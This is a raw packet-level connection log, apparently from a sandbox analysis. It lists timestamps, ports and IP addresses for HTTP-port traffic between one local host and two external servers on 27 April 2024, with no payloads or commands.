Apr 27, 2024 01:31:19.999926090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.999985933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000027895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.000030994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000118971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000155926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000200033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.000690937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000730038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000735998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.000768900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000808954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000809908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.000845909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.000880957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.000883102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001328945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001368046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001370907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.001408100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001444101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.001446962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001485109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001521111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.001524925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001564026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001602888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001606941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.001641989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001679897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.001683950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001724005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.001761913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.002769947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.043754101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.043829918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.043884993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.053105116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.053147078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.053190947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.096765995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.096887112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.119323015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.119407892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.119560003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.119647026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.120670080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120723963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120739937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.120774031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.120799065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120837927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120862961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.120892048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.120919943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120966911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.120981932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121017933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121037960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121085882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121102095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121131897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121156931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121195078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121218920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121256113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121275902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121313095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.121337891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.121366978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.189594984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.189631939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190506935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190551043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190593004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190627098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190660954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190705061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190733910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190733910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190745115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190778017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190818071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190861940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190905094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.190917969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.190965891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191148996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191195011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191303015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191365957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191400051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191416979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191453934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191499949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191512108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191540003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191544056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191581011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191582918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191623926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191631079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191672087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191692114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191709042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191711903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191751003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191751957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191791058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191796064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191832066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191843033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191874027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191884041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191924095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.191948891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.191998959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192082882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192128897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192151070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192189932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192203045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192230940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192240000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192270041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192282915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192311049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192327976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192351103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192352057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192389965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192401886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192436934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192440033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192478895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192478895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192519903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192523956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192569017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192600012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192641020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192646027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192701101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192720890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192768097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192791939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192842960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192848921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192863941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192893982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192908049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.192953110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.192986965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193012953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193026066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193054914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193095922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193105936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193140984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193159103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193192959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193207979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193250895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193254948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193289995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193353891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193373919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193392992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193419933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193423986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193459034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193460941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193497896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193511963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193550110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193722010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193766117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193783045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193835974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193865061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.193906069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.193960905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.194000959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195199966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195247889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195411921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195451975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195476055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195516109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195560932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195601940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195715904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195763111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195791960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195832014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195878983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195920944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.195943117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.195983887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196057081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196096897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196166992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196211100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196237087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196279049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196324110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196360111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196377039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196417093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196439028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196507931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196552038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196600914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196604013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196650982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196672916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196727037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196757078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196803093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.196888924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.196934938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197022915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197062969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197063923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197103024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197130919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197166920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197171926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197202921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197232008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197272062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197315931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197367907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197376966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197421074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197503090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197540998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197587967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197627068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.197705984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.197747946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.239319086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.239360094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.239398956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.239429951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.239449978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.239500999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.248450994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.248500109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.248681068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.248725891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.290338993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.290527105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.291484118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.291532040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.292289019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292346001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292395115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292450905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292488098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292543888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292603016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292643070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292665005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292690039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292753935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292800903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292817116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292853117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292907000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.292963028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.292998075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.293050051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.387211084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387253046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387291908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387372971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.387393951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387460947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.387603998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387653112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.387793064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.387840986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.388139009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388187885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.388724089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388762951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388768911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.388807058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.388820887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388865948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.388942957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388982058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.388988972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389024019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389179945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389221907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389234066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389275074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389276981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389314890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389316082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389353991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389355898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389398098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389427900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389476061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389627934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389667988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389674902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389718056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389777899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389823914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.389873028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.389919996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390378952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390424013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390585899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390625954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390635014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390665054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390667915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390707016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390712023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390748978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390844107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390892982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390897036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390934944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390938997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.390974045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.390983105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391014099 CEST	49734	80	192.168.2.4	176.97.76.106
